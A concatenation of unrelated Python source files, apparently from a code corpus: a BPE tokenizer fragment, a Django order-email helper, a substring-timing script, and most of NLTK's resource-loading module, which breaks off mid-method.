replacement: str = "▁",
add_prefix_space: bool = True,
dropout: Optional[float] = None,
fuse_unk: Optional[bool] = False,
):
if vocab is not None and merges is not None:
tokenizer = Tokenizer(
BPE(vocab, merges, dropout=dropout, unk_token=unk_token, fuse_unk=fuse_unk)
)
else:
tokenizer = Tokenizer(BPE())
if tokenizer.token_to_id(str(unk_token)) is not None:
tokenizer.add_special_tokens([str(unk_token)])
tokenizer.normalizer = NFKC()
tokenizer.pre_tokenizer = pre_tokenizers.Metaspace(
replacement=replacement, add_prefix_space=add_prefix_space
)
tokenizer.decoder = decoders.Metaspace(
replacement=replacement, add_prefix_space=add_prefix_space
)
parameters = {
"model": "SentencePieceBPE",
"unk_token": unk_token,
"replacement": replacement,
"add_prefix_space": add_prefix_space,
"dropout": dropout,
}
super().__init__(tokenizer, parameters)
@staticmethod
def from_file(vocab_filename: str, merges_filename: str, **kwargs):
vocab, merges = BPE.read_file(vocab_filename, merges_filename)
return SentencePieceBPETokenizer(vocab, merges, **kwargs)
def train(
self,
files: Union[str, List[str]],
vocab_size: int = 30000,
min_frequency: int = 2,
special_tokens: List[Union[str, AddedToken]] = ["<unk>"],
limit_alphabet: int = 1000,
initial_alphabet: List[str] = [],
show_progress: bool = True,
):
""" Train the model using the given files """
trainer = trainers.BpeTrainer(
vocab_size=vocab_size,
min_frequency=min_frequency,
special_tokens=special_tokens,
limit_alphabet=limit_alphabet,
initial_alphabet=initial_alphabet,
show_progress=show_progress,
)
if isinstance(files, str):
files = [files]
self._tokenizer.train(files, trainer=trainer)
def train_from_iterator(
self,
iterator: Union[Iterator[str], Iterator[Iterator[str]]],
vocab_size: int = 30000,
min_frequency: int = 2,
special_tokens: List[Union[str, AddedToken]] = ["<unk>"],
limit_alphabet: int = 1000,
initial_alphabet: List[str] = [],
show_progress: bool = True,
):
""" Train the model using the given iterator """
trainer = trainers.BpeTrainer(
vocab_size=vocab_size,
min_frequency=min_frequency,
special_tokens=special_tokens,
limit_alphabet=limit_alphabet,
initial_alphabet=initial_alphabet,
show_progress=show_progress,
)
self._tokenizer.train_from_iterator(iterator, trainer=trainer)
|
the-stack_0_19846 |
from django.template.loader import render_to_string
def send_order_email(user, order):
Title = 'Your Order Details'
message = render_to_string('orders/order_email.html',
{
'user': user,
'order': order
})
user.email_user(Title, message)
|
the-stack_0_19849 | """
Asess the time complexity to search for a substring.
"""
import functools
import random
import string
import timeit
import matplotlib.pyplot as plt
from tqdm import tqdm
def count(main_len=100, sub_len=10, num=10000):
"""Generate a larger string to search for a smaller string.
Both of varying length, default is a length difference of 10x.
Python doc description: Return the number of non-overlapping
occurrences of a substring
"""
def time_count():
letters = string.ascii_letters
main_string = "".join(random.choice(letters) for i in range(main_len))
sub_string = "".join(random.choice(letters) for i in range(sub_len))
timer = timeit.Timer(functools.partial(main_string.count, sub_string))
sample_time = (timer.timeit(num_time) / num_time) / num_random
return sample_time
num_random = int(num / 100)
num_time = int(num / num_random)
time_samples = [time_count() for i in range(num_random)]
avg_time = sum(time_samples) / len(time_samples)
return avg_time
if __name__ == "__main__":
n = [10, 100, 500, 1000, 5000, 10000, 50000, 100000]
big_O = [count(main_len=x, sub_len=x // 10) for x in tqdm(n)]
plt.plot(n, big_O, marker="+")
plt.show()
|
the-stack_0_19851 | # Natural Language Toolkit: Utility functions
#
# Copyright (C) 2001-2014 NLTK Project
# Author: Edward Loper <[email protected]>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Functions to find and load NLTK resource files, such as corpora,
grammars, and saved processing objects. Resource files are identified
using URLs, such as ``nltk:corpora/abc/rural.txt`` or
``http://nltk.org/sample/toy.cfg``. The following URL protocols are
supported:
- ``file:path``: Specifies the file whose path is *path*.
Both relative and absolute paths may be used.
- ``http://host/path``: Specifies the file stored on the web
server *host* at path *path*.
- ``nltk:path``: Specifies the file stored in the NLTK data
package at *path*. NLTK will search for these files in the
directories specified by ``nltk.data.path``.
If no protocol is specified, then the default protocol ``nltk:`` will
be used.
This module provides to functions that can be used to access a
resource file, given its URL: ``load()`` loads a given resource, and
adds it to a resource cache; and ``retrieve()`` copies a given resource
to a local file.
"""
from __future__ import print_function, unicode_literals
from __future__ import division
import sys
import io
import os
import textwrap
import re
import zipfile
import codecs
from gzip import GzipFile, READ as GZ_READ, WRITE as GZ_WRITE
try:
from zlib import Z_SYNC_FLUSH as FLUSH
except ImportError:
from zlib import Z_FINISH as FLUSH
try:
import cPickle as pickle
except ImportError:
import pickle
# this import should be more specific:
import nltk
from nltk.compat import py3_data, text_type, string_types, BytesIO, urlopen, url2pathname
######################################################################
# Search Path
######################################################################
path = []
"""A list of directories where the NLTK data package might reside.
These directories will be checked in order when looking for a
resource in the data package. Note that this allows users to
substitute in their own versions of resources, if they have them
(e.g., in their home directory under ~/nltk_data)."""
# User-specified locations:
path += [d for d in os.environ.get('NLTK_DATA', str('')).split(os.pathsep) if d]
if os.path.expanduser('~/') != '~/':
path.append(os.path.expanduser(str('~/nltk_data')))
if sys.platform.startswith('win'):
# Common locations on Windows:
path += [
str(r'C:\nltk_data'), str(r'D:\nltk_data'), str(r'E:\nltk_data'),
os.path.join(sys.prefix, str('nltk_data')),
os.path.join(sys.prefix, str('lib'), str('nltk_data')),
os.path.join(os.environ.get(str('APPDATA'), str('C:\\')), str('nltk_data'))
]
else:
# Common locations on UNIX & OS X:
path += [
str('/usr/share/nltk_data'),
str('/usr/local/share/nltk_data'),
str('/usr/lib/nltk_data'),
str('/usr/local/lib/nltk_data')
]
######################################################################
# Util Functions
######################################################################
def gzip_open_unicode(filename, mode="rb", compresslevel=9,
encoding='utf-8', fileobj=None, errors=None, newline=None):
if fileobj is None:
fileobj=GzipFile(filename, mode, compresslevel, fileobj)
return io.TextIOWrapper(fileobj, encoding, errors, newline)
def split_resource_url(resource_url):
"""
Splits a resource url into "<protocol>:<path>".
>>> windows = sys.platform.startswith('win')
>>> split_resource_url('nltk:home/nltk')
('nltk', 'home/nltk')
>>> split_resource_url('nltk:/home/nltk')
('nltk', '/home/nltk')
>>> split_resource_url('file:/home/nltk')
('file', '/home/nltk')
>>> split_resource_url('file:///home/nltk')
('file', '/home/nltk')
>>> split_resource_url('file:///C:/home/nltk')
('file', '/C:/home/nltk')
"""
protocol, path_ = resource_url.split(':', 1)
if protocol == 'nltk':
pass
elif protocol == 'file':
if path_.startswith('/'):
path_ = '/' + path_.lstrip('/')
else:
path_ = re.sub(r'^/{0,2}', '', path_)
return protocol, path_
def normalize_resource_url(resource_url):
r"""
Normalizes a resource url
>>> windows = sys.platform.startswith('win')
>>> os.path.normpath(split_resource_url(normalize_resource_url('file:grammar.fcfg'))[1]) == \
... ('\\' if windows else '') + os.path.abspath(os.path.join(os.curdir, 'grammar.fcfg'))
True
>>> not windows or normalize_resource_url('file:C:/dir/file') == 'file:///C:/dir/file'
True
>>> not windows or normalize_resource_url('file:C:\\dir\\file') == 'file:///C:/dir/file'
True
>>> not windows or normalize_resource_url('file:C:\\dir/file') == 'file:///C:/dir/file'
True
>>> not windows or normalize_resource_url('file://C:/dir/file') == 'file:///C:/dir/file'
True
>>> not windows or normalize_resource_url('file:////C:/dir/file') == 'file:///C:/dir/file'
True
>>> not windows or normalize_resource_url('nltk:C:/dir/file') == 'file:///C:/dir/file'
True
>>> not windows or normalize_resource_url('nltk:C:\\dir\\file') == 'file:///C:/dir/file'
True
>>> windows or normalize_resource_url('file:/dir/file/toy.cfg') == 'file:///dir/file/toy.cfg'
True
>>> normalize_resource_url('nltk:home/nltk')
'nltk:home/nltk'
>>> windows or normalize_resource_url('nltk:/home/nltk') == 'file:///home/nltk'
True
>>> normalize_resource_url('http://example.com/dir/file')
'http://example.com/dir/file'
>>> normalize_resource_url('dir/file')
'nltk:dir/file'
"""
try:
protocol, name = split_resource_url(resource_url)
except ValueError:
# the resource url has no protocol, use the nltk protocol by default
protocol = 'nltk'
name = resource_url
# use file protocol if the path is an absolute path
if protocol == 'nltk' and os.path.isabs(name):
protocol = 'file://'
name = normalize_resource_name(name, False, None)
elif protocol == 'file':
protocol = 'file://'
# name is absolute
name = normalize_resource_name(name, False, None)
elif protocol == 'nltk':
protocol = 'nltk:'
name = normalize_resource_name(name, True)
else:
# handled by urllib
protocol += '://'
return ''.join([protocol, name])
def normalize_resource_name(resource_name, allow_relative=True, relative_path=None):
"""
:type resource_name: str or unicode
:param resource_name: The name of the resource to search for.
Resource names are posix-style relative path names, such as
``corpora/brown``. Directory names will automatically
be converted to a platform-appropriate path separator.
Directory trailing slashes are preserved
>>> windows = sys.platform.startswith('win')
>>> normalize_resource_name('.', True)
'./'
>>> normalize_resource_name('./', True)
'./'
>>> windows or normalize_resource_name('dir/file', False, '/') == '/dir/file'
True
>>> not windows or normalize_resource_name('C:/file', False, '/') == '/C:/file'
True
>>> windows or normalize_resource_name('/dir/file', False, '/') == '/dir/file'
True
>>> windows or normalize_resource_name('../dir/file', False, '/') == '/dir/file'
True
"""
is_dir = bool(re.search(r'[\\/.]$', resource_name)) or resource_name.endswith(os.path.sep)
if sys.platform.startswith('win'):
resource_name = resource_name.lstrip('/')
else:
resource_name = re.sub(r'^/+', '/', resource_name)
if allow_relative:
resource_name = os.path.normpath(resource_name)
else:
if relative_path is None:
relative_path = os.curdir
resource_name = os.path.abspath(os.path.join(relative_path, resource_name))
resource_name = resource_name.replace('\\', '/').replace(os.path.sep, '/')
if sys.platform.startswith('win') and os.path.isabs(resource_name):
resource_name = '/' + resource_name
if is_dir and not resource_name.endswith('/'):
resource_name += '/'
return resource_name
######################################################################
# Path Pointers
######################################################################
class PathPointer(object):
"""
An abstract base class for 'path pointers,' used by NLTK's data
package to identify specific paths. Two subclasses exist:
``FileSystemPathPointer`` identifies a file that can be accessed
directly via a given absolute path. ``ZipFilePathPointer``
identifies a file contained within a zipfile, that can be accessed
by reading that zipfile.
"""
def open(self, encoding=None):
"""
Return a seekable read-only stream that can be used to read
the contents of the file identified by this path pointer.
:raise IOError: If the path specified by this pointer does
not contain a readable file.
"""
raise NotImplementedError('abstract base class')
def file_size(self):
"""
Return the size of the file pointed to by this path pointer,
in bytes.
:raise IOError: If the path specified by this pointer does
not contain a readable file.
"""
raise NotImplementedError('abstract base class')
def join(self, fileid):
"""
Return a new path pointer formed by starting at the path
identified by this pointer, and then following the relative
path given by ``fileid``. The path components of ``fileid``
should be separated by forward slashes, regardless of
the underlying file system's path seperator character.
"""
raise NotImplementedError('abstract base class')
class FileSystemPathPointer(PathPointer, text_type):
"""
A path pointer that identifies a file which can be accessed
directly via a given absolute path.
"""
@py3_data
def __init__(self, _path):
"""
Create a new path pointer for the given absolute path.
:raise IOError: If the given path does not exist.
"""
_path = os.path.abspath(_path)
if not os.path.exists(_path):
raise IOError('No such file or directory: %r' % _path)
self._path = _path
# There's no need to call str.__init__(), since it's a no-op;
# str does all of its setup work in __new__.
@property
def path(self):
"""The absolute path identified by this path pointer."""
return self._path
def open(self, encoding=None):
stream = open(self._path, 'rb')
if encoding is not None:
stream = SeekableUnicodeStreamReader(stream, encoding)
return stream
def file_size(self):
return os.stat(self._path).st_size
def join(self, fileid):
_path = os.path.join(self._path, fileid)
return FileSystemPathPointer(_path)
def __repr__(self):
# This should be a byte string under Python 2.x;
# we don't want transliteration here so
# @python_2_unicode_compatible is not used.
return str('FileSystemPathPointer(%r)' % self._path)
def __str__(self):
return self._path
class BufferedGzipFile(GzipFile):
"""
A ``GzipFile`` subclass that buffers calls to ``read()`` and ``write()``.
This allows faster reads and writes of data to and from gzip-compressed
files at the cost of using more memory.
The default buffer size is 2MB.
``BufferedGzipFile`` is useful for loading large gzipped pickle objects
as well as writing large encoded feature files for classifier training.
"""
SIZE = 2 * 2**20
@py3_data
def __init__(self, filename=None, mode=None, compresslevel=9,
fileobj=None, **kwargs):
"""
Return a buffered gzip file object.
:param filename: a filesystem path
:type filename: str
:param mode: a file mode which can be any of 'r', 'rb', 'a', 'ab',
'w', or 'wb'
:type mode: str
:param compresslevel: The compresslevel argument is an integer from 1
to 9 controlling the level of compression; 1 is fastest and
produces the least compression, and 9 is slowest and produces the
most compression. The default is 9.
:type compresslevel: int
:param fileobj: a BytesIO stream to read from instead of a file.
:type fileobj: BytesIO
:param size: number of bytes to buffer during calls to read() and write()
:type size: int
:rtype: BufferedGzipFile
"""
GzipFile.__init__(self, filename, mode, compresslevel, fileobj)
self._size = kwargs.get('size', self.SIZE)
self._buffer = BytesIO()
# cStringIO does not support len.
self._len = 0
def _reset_buffer(self):
# For some reason calling BytesIO.truncate() here will lead to
# inconsistent writes so just set _buffer to a new BytesIO object.
self._buffer = BytesIO()
self._len = 0
def _write_buffer(self, data):
# Simply write to the buffer and increment the buffer size.
if data is not None:
self._buffer.write(data)
self._len += len(data)
def _write_gzip(self, data):
# Write the current buffer to the GzipFile.
GzipFile.write(self, self._buffer.getvalue())
# Then reset the buffer and write the new data to the buffer.
self._reset_buffer()
self._write_buffer(data)
def close(self):
# GzipFile.close() doesn't actuallly close anything.
if self.mode == GZ_WRITE:
self._write_gzip(None)
self._reset_buffer()
return GzipFile.close(self)
def flush(self, lib_mode=FLUSH):
self._buffer.flush()
GzipFile.flush(self, lib_mode)
def read(self, size=None):
if not size:
size = self._size
contents = BytesIO()
while True:
blocks = GzipFile.read(self, size)
if not blocks:
contents.flush()
break
contents.write(blocks)
return contents.getvalue()
else:
return GzipFile.read(self, size)
def write(self, data, size=-1):
"""
:param data: bytes to write to file or buffer
:type data: bytes
:param size: buffer at least size bytes before writing to file
:type size: int
"""
if not size:
size = self._size
if self._len + len(data) <= size:
self._write_buffer(data)
else:
self._write_gzip(data)
class GzipFileSystemPathPointer(FileSystemPathPointer):
"""
A subclass of ``FileSystemPathPointer`` that identifies a gzip-compressed
file located at a given absolute path. ``GzipFileSystemPathPointer`` is
appropriate for loading large gzip-compressed pickle objects efficiently.
"""
def open(self, encoding=None):
stream = BufferedGzipFile(self._path, 'rb')
if encoding:
stream = SeekableUnicodeStreamReader(stream, encoding)
return stream
class ZipFilePathPointer(PathPointer):
"""
A path pointer that identifies a file contained within a zipfile,
which can be accessed by reading that zipfile.
"""
@py3_data
def __init__(self, zipfile, entry=''):
"""
Create a new path pointer pointing at the specified entry
in the given zipfile.
:raise IOError: If the given zipfile does not exist, or if it
does not contain the specified entry.
"""
if isinstance(zipfile, string_types):
zipfile = OpenOnDemandZipFile(os.path.abspath(zipfile))
# Normalize the entry string, it should be absolute:
entry = normalize_resource_name(entry, False, '/').lstrip('/')
# Check that the entry exists:
if entry:
try:
zipfile.getinfo(entry)
except Exception:
# Sometimes directories aren't explicitly listed in
# the zip file. So if `entry` is a directory name,
# then check if the zipfile contains any files that
# are under the given directory.
if (entry.endswith('/') and
[n for n in zipfile.namelist() if n.startswith(entry)]):
pass # zipfile contains a file in that directory.
else:
# Otherwise, complain.
raise IOError('Zipfile %r does not contain %r' %
(zipfile.filename, entry))
self._zipfile = zipfile
self._entry = entry
@property
def zipfile(self):
"""
The zipfile.ZipFile object used to access the zip file
containing the entry identified by this path pointer.
"""
return self._zipfile
@property
def entry(self):
"""
The name of the file within zipfile that this path
pointer points to.
"""
return self._entry
def open(self, encoding=None):
data = self._zipfile.read(self._entry)
stream = BytesIO(data)
if self._entry.endswith('.gz'):
stream = BufferedGzipFile(self._entry, fileobj=stream)
elif encoding is not None:
stream = SeekableUnicodeStreamReader(stream, encoding)
return stream
def file_size(self):
return self._zipfile.getinfo(self._entry).file_size
def join(self, fileid):
entry = '%s/%s' % (self._entry, fileid)
return ZipFilePathPointer(self._zipfile, entry)
def __repr__(self):
return str('ZipFilePathPointer(%r, %r)') % (
self._zipfile.filename, self._entry)
def __str__(self):
return os.path.normpath(os.path.join(self._zipfile.filename, self._entry))
######################################################################
# Access Functions
######################################################################
# Don't use a weak dictionary, because in the common case this
# causes a lot more reloading that necessary.
_resource_cache = {}
"""A dictionary used to cache resources so that they won't
need to be loaded more than once."""
def find(resource_name, paths=None):
"""
Find the given resource by searching through the directories and
zip files in paths, where a None or empty string specifies an absolute path.
Returns a corresponding path name. If the given resource is not
found, raise a ``LookupError``, whose message gives a pointer to
the installation instructions for the NLTK downloader.
Zip File Handling:
- If ``resource_name`` contains a component with a ``.zip``
extension, then it is assumed to be a zipfile; and the
remaining path components are used to look inside the zipfile.
- If any element of ``nltk.data.path`` has a ``.zip`` extension,
then it is assumed to be a zipfile.
- If a given resource name that does not contain any zipfile
component is not found initially, then ``find()`` will make a
second attempt to find that resource, by replacing each
component *p* in the path with *p.zip/p*. For example, this
allows ``find()`` to map the resource name
``corpora/chat80/cities.pl`` to a zip file path pointer to
``corpora/chat80.zip/chat80/cities.pl``.
- When using ``find()`` to locate a directory contained in a
zipfile, the resource name must end with the forward slash
character. Otherwise, ``find()`` will not locate the
directory.
:type resource_name: str or unicode
:param resource_name: The name of the resource to search for.
Resource names are posix-style relative path names, such as
``corpora/brown``. Directory names will be
automatically converted to a platform-appropriate path separator.
:rtype: str
"""
resource_name = normalize_resource_name(resource_name, True)
# Resolve default paths at runtime in-case the user overrides nltk.data.path
if paths is None:
paths=path
# Check if the resource name includes a zipfile name
m = re.match(r'(.*\.zip)/?(.*)$|', resource_name)
zipfile, zipentry = m.groups()
# Check each item in our path
for path_ in paths:
# Is the path item a zipfile?
if path_ and (os.path.isfile(path_) and path_.endswith('.zip')):
try:
return ZipFilePathPointer(path_, resource_name)
except IOError:
# resource not in zipfile
continue
# Is the path item a directory or is resource_name an absolute path?
elif not path_ or os.path.isdir(path_):
if zipfile is None:
p = os.path.join(path_, url2pathname(resource_name))
if os.path.exists(p):
if p.endswith('.gz'):
return GzipFileSystemPathPointer(p)
else:
return FileSystemPathPointer(p)
else:
p = os.path.join(path_, url2pathname(zipfile))
if os.path.exists(p):
try:
return ZipFilePathPointer(p, zipentry)
except IOError:
# resource not in zipfile
continue
# Fallback: if the path doesn't include a zip file, then try
# again, assuming that one of the path components is inside a
# zipfile of the same name.
if zipfile is None:
pieces = resource_name.split('/')
for i in range(len(pieces)):
modified_name = '/'.join(pieces[:i]+[pieces[i]+'.zip']+pieces[i:])
try:
return find(modified_name, paths)
except LookupError:
pass
# Display a friendly error message if the resource wasn't found:
msg = textwrap.fill(
'Resource %r not found. Please use the NLTK Downloader to '
'obtain the resource: >>> nltk.download()' %
(resource_name,), initial_indent=' ', subsequent_indent=' ',
width=66)
msg += '\n Searched in:' + ''.join('\n - %r' % d for d in paths)
sep = '*'*70
resource_not_found = '\n%s\n%s\n%s' % (sep, msg, sep)
raise LookupError(resource_not_found)
def retrieve(resource_url, filename=None, verbose=True):
"""
Copy the given resource to a local file. If no filename is
specified, then use the URL's filename. If there is already a
file named ``filename``, then raise a ``ValueError``.
:type resource_url: str
:param resource_url: A URL specifying where the resource should be
loaded from. The default protocol is "nltk:", which searches
for the file in the the NLTK data package.
"""
resource_url = normalize_resource_url(resource_url)
if filename is None:
if resource_url.startswith('file:'):
filename = os.path.split(resource_url)[-1]
else:
filename = re.sub(r'(^\w+:)?.*/', '', resource_url)
if os.path.exists(filename):
filename = os.path.abspath(filename)
raise ValueError("File %r already exists!" % filename)
if verbose:
print('Retrieving %r, saving to %r' % (resource_url, filename))
# Open the input & output streams.
infile = _open(resource_url)
# Copy infile -> outfile, using 64k blocks.
with open(filename, "wb") as outfile:
while True:
s = infile.read(1024*64) # 64k blocks.
outfile.write(s)
if not s: break
infile.close()
#: A dictionary describing the formats that are supported by NLTK's
#: load() method. Keys are format names, and values are format
#: descriptions.
FORMATS = {
'pickle': "A serialized python object, stored using the pickle module.",
'json': "A serialized python object, stored using the json module.",
'yaml': "A serialized python object, stored using the yaml module.",
'cfg': "A context free grammar.",
'pcfg': "A probabilistic CFG.",
'fcfg': "A feature CFG.",
'fol': "A list of first order logic expressions, parsed with "
"nltk.sem.logic.Expression.fromstring.",
'logic': "A list of first order logic expressions, parsed with "
"nltk.sem.logic.LogicParser. Requires an additional logic_parser "
"parameter",
'val': "A semantic valuation, parsed by nltk.sem.Valuation.fromstring.",
'raw': "The raw (byte string) contents of a file.",
'text': "The raw (unicode string) contents of a file. "
}
#: A dictionary mapping from file extensions to format names, used
#: by load() when format="auto" to decide the format for a
#: given resource url.
AUTO_FORMATS = {
'pickle': 'pickle',
'json': 'json',
'yaml': 'yaml',
'cfg': 'cfg',
'pcfg': 'pcfg',
'fcfg': 'fcfg',
'fol': 'fol',
'logic': 'logic',
'val': 'val',
'txt': 'text',
'text': 'text',
}
def load(resource_url, format='auto', cache=True, verbose=False,
logic_parser=None, fstruct_reader=None, encoding=None):
"""
Load a given resource from the NLTK data package. The following
resource formats are currently supported:
- ``pickle``
- ``json``
- ``yaml``
- ``cfg`` (context free grammars)
- ``pcfg`` (probabilistic CFGs)
- ``fcfg`` (feature-based CFGs)
- ``fol`` (formulas of First Order Logic)
- ``logic`` (Logical formulas to be parsed by the given logic_parser)
- ``val`` (valuation of First Order Logic model)
- ``text`` (the file contents as a unicode string)
- ``raw`` (the raw file contents as a byte string)
If no format is specified, ``load()`` will attempt to determine a
format based on the resource name's file extension. If that
fails, ``load()`` will raise a ``ValueError`` exception.
For all text formats (everything except ``pickle``, ``json``, ``yaml`` and ``raw``),
it tries to decode the raw contents using UTF-8, and if that doesn't
work, it tries with ISO-8859-1 (Latin-1), unless the ``encoding``
is specified.
:type resource_url: str
:param resource_url: A URL specifying where the resource should be
loaded from. The default protocol is "nltk:", which searches
for the file in the the NLTK data package.
:type cache: bool
:param cache: If true, add this resource to a cache. If load()
finds a resource in its cache, then it will return it from the
cache rather than loading it. The cache uses weak references,
so a resource wil automatically be expunged from the cache
when no more objects are using it.
:type verbose: bool
:param verbose: If true, print a message when loading a resource.
Messages are not displayed when a resource is retrieved from
the cache.
:type logic_parser: LogicParser
:param logic_parser: The parser that will be used to parse logical
expressions.
:type fstruct_reader: FeatStructReader
:param fstruct_reader: The parser that will be used to parse the
feature structure of an fcfg.
:type encoding: str
:param encoding: the encoding of the input; only used for text formats.
"""
resource_url=normalize_resource_url(resource_url)
# Determine the format of the resource.
if format == 'auto':
resource_url_parts = resource_url.split('.')
ext = resource_url_parts[-1]
if ext == 'gz':
ext = resource_url_parts[-2]
format = AUTO_FORMATS.get(ext)
if format is None:
raise ValueError('Could not determine format for %s based '
'on its file\nextension; use the "format" '
'argument to specify the format explicitly.'
% resource_url)
if format not in FORMATS:
raise ValueError('Unknown format type: %s!' % (format,))
# If we've cached the resource, then just return it.
if cache:
resource_val = _resource_cache.get((resource_url, format))
if resource_val is not None:
if verbose:
print('<<Using cached copy of %s>>' % (resource_url,))
return resource_val
# Let the user know what's going on.
if verbose:
print('<<Loading %s>>' % (resource_url,))
# Load the resource.
opened_resource = _open(resource_url)
if format == 'raw':
resource_val = opened_resource.read()
elif format == 'pickle':
resource_val = pickle.load(opened_resource)
elif format == 'json':
import json
from nltk.jsontags import json_tags
resource_val = json.load(opened_resource)
tag = None
if len(resource_val) != 1:
tag = next(resource_val.keys())
if tag not in json_tags:
raise ValueError('Unknown json tag.')
elif format == 'yaml':
import yaml
resource_val = yaml.load(opened_resource)
else:
# The resource is a text format.
binary_data = opened_resource.read()
if encoding is not None:
string_data = binary_data.decode(encoding)
else:
try:
string_data = binary_data.decode('utf-8')
except UnicodeDecodeError:
string_data = binary_data.decode('latin-1')
if format == 'text':
resource_val = string_data
elif format == 'cfg':
resource_val = nltk.grammar.CFG.fromstring(
string_data, encoding=encoding)
elif format == 'pcfg':
resource_val = nltk.grammar.PCFG.fromstring(
string_data, encoding=encoding)
elif format == 'fcfg':
resource_val = nltk.grammar.FeatureGrammar.fromstring(
string_data, logic_parser=logic_parser,
fstruct_reader=fstruct_reader, encoding=encoding)
elif format == 'fol':
resource_val = nltk.sem.read_logic(
string_data, logic_parser=nltk.sem.logic.LogicParser(),
encoding=encoding)
elif format == 'logic':
resource_val = nltk.sem.read_logic(
string_data, logic_parser=logic_parser, encoding=encoding)
elif format == 'val':
resource_val = nltk.sem.read_valuation(
string_data, encoding=encoding)
else:
raise AssertionError("Internal NLTK error: Format %s isn't "
"handled by nltk.data.load()" % (format,))
opened_resource.close()
# If requested, add it to the cache.
if cache:
try:
_resource_cache[(resource_url, format)] = resource_val
# TODO: add this line
# print('<<Caching a copy of %s>>' % (resource_url,))
except TypeError:
# We can't create weak references to some object types, like
# strings and tuples. For now, just don't cache them.
pass
return resource_val
def show_cfg(resource_url, escape='##'):
"""
Write out a grammar file, ignoring escaped and empty lines.
:type resource_url: str
:param resource_url: A URL specifying where the resource should be
loaded from. The default protocol is "nltk:", which searches
for the file in the the NLTK data package.
:type escape: str
:param escape: Prepended string that signals lines to be ignored
"""
resource_url = normalize_resource_url(resource_url)
resource_val = load(resource_url, format='text', cache=False)
lines = resource_val.splitlines()
for l in lines:
if l.startswith(escape): continue
if re.match('^$', l): continue
print(l)
def clear_cache():
"""
Remove all objects from the resource cache.
:see: load()
"""
_resource_cache.clear()
def _open(resource_url):
"""
Helper function that returns an open file object for a resource,
given its resource URL. If the given resource URL uses the "nltk:"
protocol, or uses no protocol, then use ``nltk.data.find`` to find
its path, and open it with the given mode; if the resource URL
uses the 'file' protocol, then open the file with the given mode;
otherwise, delegate to ``urllib2.urlopen``.
:type resource_url: str
:param resource_url: A URL specifying where the resource should be
loaded from. The default protocol is "nltk:", which searches
for the file in the the NLTK data package.
"""
resource_url = normalize_resource_url(resource_url)
protocol, path_ = split_resource_url(resource_url)
if protocol is None or protocol.lower() == 'nltk':
return find(path_, path + ['']).open()
elif protocol.lower() == 'file':
# urllib might not use mode='rb', so handle this one ourselves:
return find(path_, ['']).open()
else:
return urlopen(resource_url)
######################################################################
# Lazy Resource Loader
######################################################################
# We shouldn't apply @python_2_unicode_compatible
# decorator to LazyLoader, this is resource.__class__ responsibility.
class LazyLoader(object):
@py3_data
def __init__(self, _path):
self._path = _path
def __load(self):
resource = load(self._path)
# This is where the magic happens! Transform ourselves into
# the object by modifying our own __dict__ and __class__ to
# match that of `resource`.
self.__dict__ = resource.__dict__
self.__class__ = resource.__class__
def __getattr__(self, attr):
self.__load()
# This looks circular, but its not, since __load() changes our
# __class__ to something new:
return getattr(self, attr)
def __repr__(self):
self.__load()
# This looks circular, but its not, since __load() changes our
# __class__ to something new:
return repr(self)
######################################################################
# Open-On-Demand ZipFile
######################################################################
class OpenOnDemandZipFile(zipfile.ZipFile):
"""
A subclass of ``zipfile.ZipFile`` that closes its file pointer
whenever it is not using it; and re-opens it when it needs to read
data from the zipfile. This is useful for reducing the number of
open file handles when many zip files are being accessed at once.
``OpenOnDemandZipFile`` must be constructed from a filename, not a
file-like object (to allow re-opening). ``OpenOnDemandZipFile`` is
read-only (i.e. ``write()`` and ``writestr()`` are disabled.
"""
@py3_data
def __init__(self, filename):
if not isinstance(filename, string_types):
raise TypeError('ReopenableZipFile filename must be a string')
zipfile.ZipFile.__init__(self, filename)
assert self.filename == filename
self.close()
def read(self, name):
assert self.fp is None
self.fp = open(self.filename, 'rb')
value = zipfile.ZipFile.read(self, name)
self.close()
return value
def write(self, *args, **kwargs):
""":raise NotImplementedError: OpenOnDemandZipfile is read-only"""
raise NotImplementedError('OpenOnDemandZipfile is read-only')
def writestr(self, *args, **kwargs):
""":raise NotImplementedError: OpenOnDemandZipfile is read-only"""
raise NotImplementedError('OpenOnDemandZipfile is read-only')
def __repr__(self):
return repr(str('OpenOnDemandZipFile(%r)') % self.filename)
######################################################################
#{ Seekable Unicode Stream Reader
######################################################################
class SeekableUnicodeStreamReader(object):
"""
A stream reader that automatically encodes the source byte stream
into unicode (like ``codecs.StreamReader``); but still supports the
``seek()`` and ``tell()`` operations correctly. This is in contrast
to ``codecs.StreamReader``, which provide *broken* ``seek()`` and
``tell()`` methods.
This class was motivated by ``StreamBackedCorpusView``, which
makes extensive use of ``seek()`` and ``tell()``, and needs to be
able to handle unicode-encoded files.
Note: this class requires stateless decoders. To my knowledge,
this shouldn't cause a problem with any of python's builtin
unicode encodings.
"""
DEBUG = True #: If true, then perform extra sanity checks.
@py3_data
def __init__(self, stream, encoding, errors='strict'):
# Rewind the stream to its beginning.
stream.seek(0)
self.stream = stream
"""The underlying stream."""
self.encoding = encoding
"""The name of the encoding that should be used to encode the
underlying stream."""
self.errors = errors
"""The error mode that should be used when decoding data from
the underlying stream. Can be 'strict', 'ignore', or
'replace'."""
self.decode = codecs.getdecoder(encoding)
"""The function that is used to decode byte strings into
unicode strings."""
self.bytebuffer = b''
"""A buffer to use bytes that have been read but have not yet
been decoded. This is only used when the final bytes from
a read do not form a complete encoding for a character."""
self.linebuffer = None
"""A buffer used by ``readline()`` to hold characters that have
been read, but have not yet been returned by ``read()`` or
``readline()``. This buffer consists of a list of unicode
strings, where each string corresponds to a single line.
The final element of the list may or may not be a complete
line. Note that the existence of a linebuffer makes the
``tell()`` operation more complex, because it must backtrack
to the beginning of the buffer to determine the correct
file position in the underlying byte stream."""
self._rewind_checkpoint = 0
"""The file position at which the most recent read on the
underlying stream began. This is used, together with
``_rewind_numchars``, to backtrack to the beginning of
``linebuffer`` (which is required by ``tell()``)."""
self._rewind_numchars = None
"""The number of characters that have been returned since the
read that started at ``_rewind_checkpoint``. This is used,
together with ``_rewind_checkpoint``, to backtrack to the
beginning of ``linebuffer`` (which is required by ``tell()``)."""
self._bom = self._check_bom()
"""The length of the byte order marker at the beginning of
the stream (or None for no byte order marker)."""
#/////////////////////////////////////////////////////////////////
# Read methods
#/////////////////////////////////////////////////////////////////
def read(self, size=None):
"""
Read up to ``size`` bytes, decode them using this reader's
encoding, and return the resulting unicode string.
:param size: The maximum number of bytes to read. If not
specified, then read as many bytes as possible.
:type size: int
:rtype: unicode
"""
chars = self._read(size)
# If linebuffer is not empty, then include it in the result
if self.linebuffer:
